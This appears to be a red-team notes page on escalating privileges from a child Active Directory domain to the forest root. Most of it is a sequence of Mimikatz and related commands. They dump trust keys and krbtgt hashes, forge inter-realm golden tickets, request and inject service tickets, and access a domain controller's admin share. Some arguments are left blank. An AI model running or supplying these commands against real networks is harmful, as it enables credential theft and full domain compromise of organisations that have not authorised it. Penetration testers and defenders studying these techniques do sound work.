privilege_escalation_across_trusts

PRIVILEGE ESCALATION ACROSS TRUSTS Privilege Escalation Across Trusts

  1. Child to Forest Root

  2. Domains in same Forest have an implicit two-way trust with the Forest Root

  3. There is a trust key between the parent and child domains

  4. There are two ways of escalating privileges between two domains of the same forest

  5. KRBTGT hash

  6. Trust Tickets

Forging Trust Tickets Child to Forest Root

Invoke-Mimikatz -Command '"lsadump::trust /patch"'

Once we have the Trust Key, let's forge and interrealm TGT

Invoke-Mimikatz -Command '"Kerberos::golden /domain:victim.local /sid: /sids: /rc4: /user:Administrator /service:krbtgt /target: /ticket:"'

Getting a TGS for a service such as CIFS by using the forged trust ticket

.\asktgs.exe C:\Users\pathToTicket.kirbi CIFS/victim.local

Tickets for other services like Host and RPCSS for WMI, HOST ans HTTP for Powershell Remoting and WinRM can also be created

Once we have the TGS for a service, we can ise the TGS to access the targeted service with the following

.\kirbikator.exe lsa .\CIFS.victim.local.kirbi ls \dc01.victim.local\C$

Forging a ticket from Child Domain to Forest Root using krbtgt hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid:<child domain SID /krbtgt: /sids: /ticket:

On a machine of the parent domain you wanna get into

Invoke-Mimikatz -Command '"kerberos::ptt C:\locationof.kirbi_file"'

Previousred-teamNextfile_servers_and_files

Last updated

Was this helpful?